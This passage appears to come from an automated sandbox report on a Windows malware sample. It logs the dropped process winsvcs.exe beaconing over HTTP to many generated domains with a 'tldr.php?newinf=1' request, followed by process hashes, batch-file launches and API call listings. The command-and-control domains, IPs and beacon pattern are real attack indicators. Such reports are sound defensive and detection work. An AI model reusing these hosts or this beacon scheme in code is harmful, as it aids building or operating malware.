Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49749	44.221.84.105	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:14:48.618901968 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: fiiauediehduefuge.ru
Jul 25, 2024 15:14:49.123444080 CEST	418	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:14:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5d394de2fa783cfce7dc55d49785cf26\|8.46.123.33\|1721913289\|1721913289\|0\|1\|0; path=/; domain=.fiiauediehduefuge.ru; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49751	92.246.89.93	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:14:55.240864038 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: ssofhoseuegsgrfnj.su

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49753	92.246.89.93	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:09.417257071 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: afeifieuuufufufuf.su

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49754	208.100.26.245	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:22.135179043 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: ssofhoseuegsgrfnj.in
Jul 25, 2024 15:15:22.630103111 CEST	342	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Thu, 25 Jul 2024 13:15:22 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49755	44.213.104.86	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:27.873435020 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: eiifngjfksisiufjf.in
Jul 25, 2024 15:15:28.415024996 CEST	418	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:15:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=32e0f397b678c58e90a7b788e7de14f9\|8.46.123.33\|1721913328\|1721913328\|0\|1\|0; path=/; domain=.eiifngjfksisiufjf.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49756	44.221.84.105	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:32.783184052 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: iuirshriuisruruuf.in
Jul 25, 2024 15:15:33.325500965 CEST	418	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:15:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c886a0d97b9ab40dcb316a6dc68c9601\|8.46.123.33\|1721913333\|1721913333\|0\|1\|0; path=/; domain=.iuirshriuisruruuf.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49759	13.251.16.150	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:43.979273081 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: slpsrgpsrhojifdij.net
Jul 25, 2024 15:15:45.377959013 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:15:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=65a065b29d2273d590d44b5242b07716\|8.46.123.33\|1721913345\|1721913345\|0\|1\|0; path=/; domain=.slpsrgpsrhojifdij.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49760	185.215.113.66	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:46.680414915 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: aiiaiafrzrueuedur.net
Jul 25, 2024 15:15:47.481281042 CEST	326	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Jul 2024 13:15:47 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49761	18.141.10.107	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:15:58.230988979 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: nousiieiffgogogoo.net
Jul 25, 2024 15:15:59.589257002 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:15:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d4292fa8923a1241bbe132bd499456c0\|8.46.123.33\|1721913359\|1721913359\|0\|1\|0; path=/; domain=.nousiieiffgogogoo.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49762	44.213.104.86	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:02.079317093 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: eofihsishihiursgu.net
Jul 25, 2024 15:16:02.560853004 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=dbf8f86f2ed8ad8eafb21eb14f2bd49b\|8.46.123.33\|1721913362\|1721913362\|0\|1\|0; path=/; domain=.eofihsishihiursgu.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49763	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:03.882386923 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: ssofhoseuegsgrfnj.biz
Jul 25, 2024 15:16:04.593945980 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5c4753b361b1eb941ef57a8440589e30\|8.46.123.33\|1721913364\|1721913364\|0\|1\|0; path=/; domain=.ssofhoseuegsgrfnj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49764	34.218.204.173	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:09.708934069 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: eiifngjfksisiufjf.biz
Jul 25, 2024 15:16:10.421859026 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4fd2a6dbe45ae70787377705520077bb\|8.46.123.33\|1721913370\|1721913370\|0\|1\|0; path=/; domain=.eiifngjfksisiufjf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49766	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:12.862078905 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: noeuaoenriusfiruu.biz
Jul 25, 2024 15:16:13.643528938 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d9572a018c7a18b1f9b47fbe62723bee\|8.46.123.33\|1721913373\|1721913373\|0\|1\|0; path=/; domain=.noeuaoenriusfiruu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49767	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:20.979919910 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: fifiehsueuufidhfi.biz
Jul 25, 2024 15:16:22.126832962 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=439a750021572922cb918eec537366b2\|8.46.123.33\|1721913381\|1721913381\|0\|1\|0; path=/; domain=.fifiehsueuufidhfi.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 25, 2024 15:16:22.129607916 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=439a750021572922cb918eec537366b2\|8.46.123.33\|1721913381\|1721913381\|0\|1\|0; path=/; domain=.fifiehsueuufidhfi.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49769	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:29.674860954 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: fuaiuebndieufeufu.com
Jul 25, 2024 15:16:30.553319931 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:16:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=347c23a7b656d6c1b8f7a9cfa806cb1a\|8.46.123.33\|1721913390\|1721913390\|0\|1\|0; path=/; domain=.fuaiuebndieufeufu.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49770	74.119.239.234	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:16:36.376218081 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: afeifieuuufufufuf.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49771	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:17:04.491183043 CEST	159	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: fifiehsueuufidhfi.com
Jul 25, 2024 15:17:05.252253056 CEST	419	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:17:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0ee4b51c6cf4163101bc36868ae30c45\|8.46.123.33\|1721913425\|1721913425\|0\|1\|0; path=/; domain=.fifiehsueuufidhfi.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49772	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:17:09.057415962 CEST	264	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: ssofhoseuegsgrfnj.biz Cookie: btst=5c4753b361b1eb941ef57a8440589e30\|8.46.123.33\|1721913364\|1721913364\|0\|1\|0; snkz=8.46.123.33
Jul 25, 2024 15:17:09.953108072 CEST	343	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:17:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5c4753b361b1eb941ef57a8440589e30\|8.46.123.33\|1721913429\|1721913364\|32\|2\|0; path=/; domain=.ssofhoseuegsgrfnj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49773	34.218.204.173	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:17:15.055804968 CEST	264	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: eiifngjfksisiufjf.biz Cookie: btst=4fd2a6dbe45ae70787377705520077bb\|8.46.123.33\|1721913370\|1721913370\|0\|1\|0; snkz=8.46.123.33
Jul 25, 2024 15:17:15.810820103 CEST	343	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:17:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4fd2a6dbe45ae70787377705520077bb\|8.46.123.33\|1721913435\|1721913370\|32\|2\|0; path=/; domain=.eiifngjfksisiufjf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49774	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:17:18.072652102 CEST	264	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: noeuaoenriusfiruu.biz Cookie: btst=d9572a018c7a18b1f9b47fbe62723bee\|8.46.123.33\|1721913373\|1721913373\|0\|1\|0; snkz=8.46.123.33
Jul 25, 2024 15:17:18.813992977 CEST	343	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:17:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d9572a018c7a18b1f9b47fbe62723bee\|8.46.123.33\|1721913438\|1721913373\|32\|2\|0; path=/; domain=.noeuaoenriusfiruu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49775	54.244.188.177	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:17:25.699661016 CEST	264	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: fifiehsueuufidhfi.biz Cookie: btst=439a750021572922cb918eec537366b2\|8.46.123.33\|1721913381\|1721913381\|0\|1\|0; snkz=8.46.123.33
Jul 25, 2024 15:17:26.514657974 CEST	343	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 13:17:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=439a750021572922cb918eec537366b2\|8.46.123.33\|1721913446\|1721913381\|32\|2\|0; path=/; domain=.fifiehsueuufidhfi.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:13:17
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002B_290.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_290.exe"
Imagebase:	0x400000
File size:	479'744 bytes
MD5 hash:	8DA4D99EBBA9A59FA372EEFD2556860C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:13:17
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Imagebase:	0x610000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:13:24
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584
Imagebase:	0x850000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:13:27
Start date:	25/07/2024
Path:	C:\Windows\94000696690303050\winsvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\94000696690303050\winsvcs.exe
Imagebase:	0x7ff66e660000
File size:	479'744 bytes
MD5 hash:	8DA4D99EBBA9A59FA372EEFD2556860C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:13:36
Start date:	25/07/2024
Path:	C:\Windows\94000696690303050\winsvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\94000696690303050\winsvcs.exe"
Imagebase:	0x400000
File size:	479'744 bytes
MD5 hash:	8DA4D99EBBA9A59FA372EEFD2556860C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:13:36
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Imagebase:	0x6e0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:13:55
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:13:55
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:14:04
Start date:	25/07/2024
Path:	C:\Windows\94000696690303050\winsvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\94000696690303050\winsvcs.exe"
Imagebase:	0x400000
File size:	479'744 bytes
MD5 hash:	8DA4D99EBBA9A59FA372EEFD2556860C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:14:04
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
Imagebase:	0x180000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:14:04
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:14:04
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	8.5%
Signature Coverage:	18.6%
Total number of Nodes:	1274
Total number of Limit Nodes:	23

Executed Functions

Function 0040B517 Relevance: 852.7, APIs: 470, Strings: 15, Instructions: 3992windowtimethreadCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000007B), ref: 0040B567
GetClientRect.USER32(?,?), ref: 0040B578
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
SelectObject.GDI32(0044A655,00000000), ref: 0040B648
SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
SetTextColor.GDI32(0044A655,?), ref: 0040B662
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
